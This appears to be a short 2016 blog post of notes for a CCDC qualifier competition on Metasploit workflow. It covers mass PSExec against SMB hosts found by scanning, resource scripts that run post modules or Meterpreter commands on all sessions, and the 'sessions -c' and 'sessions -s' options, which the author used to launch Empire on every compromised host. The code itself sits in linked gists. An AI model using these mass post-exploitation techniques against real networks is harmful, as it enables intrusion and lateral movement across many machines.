Saturday, February 27, 2016

CCDC Quals Notes (metasploit)


Some quick notes for interesting stuff to keep for CCDC Quals/Notes


Rapid Fire PSExec

Use db_nmap to scan and populate the databse or db_import to import nmap xml into your workspace.  This one uses open port 445 to query the database

https://gist.github.com/carnal0wnage/d058913628ba4a3d6363

This one uses open service of smb to query the database

https://gist.github.com/carnal0wnage/1f3944b4dd7eb6a54fd3


Running Metasploit Post modules against all sessions

Resource script to run a single post module against all sessions.  Navigate to your post module, set up any required options then run this resource script.

https://gist.github.com/carnal0wnage/16cd70615dcebd378914

Got this from: https://k0st.wordpress.com/2015/07/10/running-commands-on-multiple-meterpreter-sessions/

Update: Dre mentioned his already exists here:
https://github.com/rapid7/metasploit-framework/blob/master/scripts/resource/run_all_post.rc

Running a Meterpreter Command against all sessions

https://gist.github.com/carnal0wnage/b6fd24a19697e58bde96

Got the code from mubix

Running a Windows command against all sessions
This functionality is already built into the sessions command


Just run sessions -c "command" and if you don't put a session to interact with it will run on all sessions.

I used this to run the Empire launcher on all sessions.

Running a Meterpreter script against all sessions


Just run sessions -s meter_script and if you don't put a session to interact with it will run on all sessions.


CG